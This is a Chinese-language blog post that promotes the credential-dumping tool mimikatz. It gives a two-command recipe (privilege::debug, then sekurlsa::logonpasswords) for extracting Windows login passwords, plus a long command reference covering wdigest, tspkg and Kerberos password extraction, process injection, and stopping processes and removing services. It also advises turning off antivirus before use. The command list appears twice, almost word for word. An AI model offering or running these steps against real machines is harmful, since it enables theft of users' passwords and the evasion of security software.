本文最后更新于2022年5月23日,已超过 1 年没有更新,如果文章内容失效,请 反馈 给我们,谢谢!
有人说了是在电脑上用的既然都开机了还要这球艺干嘛呢?肯定会有人喜欢的。神器mimikatz,能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多功能等着大家来发现!
附上一张效果图
使用方法仅需要两条命令即可完成登陆密码轻松到手
第一条:privilege::debug
//提升权限
第二条:sekurlsa::logonpasswords
//抓取密码
mimikatz命令大全
一、常规的操作使用命令1、mimikatz # cls –>清屏,类似dos命令cls
2、mimikatz # exit –>退出mimikatz
3、mimikatz #version –>查看当前的mimikatz的版本
二、系统方面的操作使用命令:system
1、mimikatz #system::user –>查看当前登录的系统用户
2、mimikazt #system::computer –>返回当前的计算机名称
三、在服务器终端的操作命令: ts
1、mimikatz #ts::sessions –>显示当前的会话
2、mimikatz #ts::processes windows-d.vm.nirvana.local –>显示服务器的进程和对应的pid情况等
四、系统服务相关的操作使用命令:service
五、系统进程相关操作的使用命令:process
六、系统线程相关操作使用命令:thread
七、系统句柄相关操作使用命令:handle
八、加密相关操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基础命令
1、cls清屏
2、exit退出
3、version查看mimikatz的版本
4、help查看帮助信息
5、system::user查看当前登录的系统用户
6、system::computer查看计算机名称
7、process::list列出进程
8、process::suspend进程名称-暂停进程
9、process::stop进程名称-结束进程
10、process::modules列出系统的核心模块及所在位置
11、service::list列出系统的服务
12、service::remove移除系统的服务
13、service::start stop服务名称-启动或停止服务
14、privilege::list列出权限列表
15、privilege::enable激活一个或多个权限
16、privilege::debug提升权限
17、nogpo::cmd打开系统的cmd.exe
18、nogpo::regedit打开系统的注册表
19、nogpo::taskmgr打开任务管理器
20、ts::sessions显示当前的会话
21、ts::processes显示进程和对应的pid情况等
22、sekurlsa::wdigest获取本地用户信息及密码
23、sekurlsa::wdigest获取kerberos用户信息及密码
24、sekurlsa::tspkg获取tspkg用户信息及密码
25、sekurlsa::logonPasswords获登陆用户信息及密码
2、mimikatz # exit –>退出mimikatz
3、mimikatz #version –>查看当前的mimikatz的版本
二、系统方面的操作使用命令:system
1、mimikatz #system::user –>查看当前登录的系统用户
2、mimikazt #system::computer –>返回当前的计算机名称
三、在服务器终端的操作命令: ts
1、mimikatz #ts::sessions –>显示当前的会话
2、mimikatz #ts::processes windows-d.vm.nirvana.local –>显示服务器的进程和对应的pid情况等
四、系统服务相关的操作使用命令:service
五、系统进程相关操作的使用命令:process
六、系统线程相关操作使用命令:thread
七、系统句柄相关操作使用命令:handle
八、加密相关操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基础命令
1、cls清屏
2、exit退出
3、version查看mimikatz的版本
4、help查看帮助信息
5、system::user查看当前登录的系统用户
6、system::computer查看计算机名称
7、process::list列出进程
8、process::suspend进程名称-暂停进程
9、process::stop进程名称-结束进程
10、process::modules列出系统的核心模块及所在位置
11、service::list列出系统的服务
12、service::remove移除系统的服务
13、service::start stop服务名称-启动或停止服务
14、privilege::list列出权限列表
15、privilege::enable激活一个或多个权限
16、privilege::debug提升权限
17、nogpo::cmd打开系统的cmd.exe
18、nogpo::regedit打开系统的注册表
19、nogpo::taskmgr打开任务管理器
20、ts::sessions显示当前的会话
21、ts::processes显示进程和对应的pid情况等
22、sekurlsa::wdigest获取本地用户信息及密码
23、sekurlsa::wdigest获取kerberos用户信息及密码
24、sekurlsa::tspkg获取tspkg用户信息及密码
25、sekurlsa::logonPasswords获登陆用户信息及密码
mimikatz官方网站:
http://blog.gentilkiwi.com/mimikatz注:此类工具不用多说会提示报毒关闭杀毒软件再用!
版权所有丨如未注明 , 均为原创丨本网站采用 BY-NC-SA 协议进行授权 , 转载请注明 出处!
